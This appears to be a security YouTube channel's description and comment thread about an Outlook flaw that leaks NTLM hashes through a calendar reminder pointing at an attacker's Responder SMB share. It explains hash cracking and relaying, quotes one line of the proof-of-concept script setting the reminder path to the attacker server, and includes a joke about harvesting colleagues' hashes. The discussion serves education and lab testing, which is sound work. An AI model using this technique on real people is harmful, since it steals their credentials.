The official channel for Machevalia's cybersecurity content. Learn about various topics, tactics, techniques, and procedures that cybersecurity professionals use. I cover a variety of topics from how to hack (ethically), investigate SOC alarms, conduct forensics investigations, and general cybersecurity concepts.
What are the hashes that are retrived with this CVE for? Are they password hashes for the users to access the SMB? Im sorry if I'm asking a dumb question here, i just couldn't really gather what the hashes represent Edit: I guess you get NTLM hashes representing the users AD password?
Hey thanks... good video. I'm just dipping my toes into security. When you say "dumping hashes" what exactly is going on there? What is happeneing? I understand its bad... but exactly how? Also, what is that responder application/server you were talking about do?
Hey Ryan, good question. Within a lot of Windows processes there is authentication occurring under the hood that a normal user is unaware of. Being extremely user-friendly Windows takes care of that for us. However, issues can arise when an attacker finds a way to take advantage of this automatic authentication which is what is occurring here. Essentially, Responder.py is a fake SMB share that, when a victim machine requests a resource like our fake appointment sound file via that UNC path we provide, obtains a victim's NTLM password hash. With that, and attacker could attempt to crack the victims password hash to recover their actual password, or they could even relay that NTLM hash in some cases to authenticate to another service as the victim user. I would recommend reading up on pass-the-hash attacks for more.
Thanks for the walk-through! can you please let me know whether Responder tool and the Attacker's SMB should be on the same machine in order for it to work? I'm getting the invite but I don't see the hashes.
Responder can be anywhere that is either accessible by the victim on the LAN or on the public Internet. If you have SMB outbound blocked then responder on the local network will still work as long as the victim can reach it. An easy way to test is open file explorer on the victim and in the address bar navigate to \\<responder IP\share and you should be prompted to authenticate to responder. If that isn't working, you may also want to make sure you have a vulnerable version of Outlook installed since there is a patch out.
@@machevalia Thanks, can you please share which Outlook version did you use during your test? I'm running Outlook for Office 365 (16.0.12527.22286) 32-bit and it doesn't seem to work. I checked that SMB outbound isn't blocked on the victim's machine and it can access the share I configured in the PS script.
Interesting, I am not sure without going fully into troubleshooting it. I know the patches version is 16.0.16130.20306+ so it looks like you should be good. May just have to play around with it some more. I haven't done much with it since the video but I had varying degrees of success with different versions of Outlook, network configurations, and each of the various PoCs. Its a finicky one.
@@machevalia Thanks! it was an environmental issue on my end. I managed to resolve this! Do you by chance know where the UNC path is stored in the .EML file? I couldn't find it which is truly interesting that this info doesn't show but can triggered regardless.
$meeting.ReminderSoundFile = "\\<UNC PATH>" # Change to your SMB server How should fill in here? I filled in my local ip, and started Responder on my machine, Outlook has a calendar reminder popup, but I did not receive the NTLM hash
Sounds like you need to make sure your "victim" running Outlook can access the IP address of the machine running responder. If you're using a virtual machine for Responder, check the NIC settings.
Hey, nice walk through! Glad you found the script useful (I'm ka7ana). Would be interested to know if you got round to trying it out on your colleagues and managed to grab their hashes too! :D
I successfully received the local ntlm hash during local testing, but only once. When I tried to modify it and send it to the remote user, I did not receive the hash but only an IPC connection.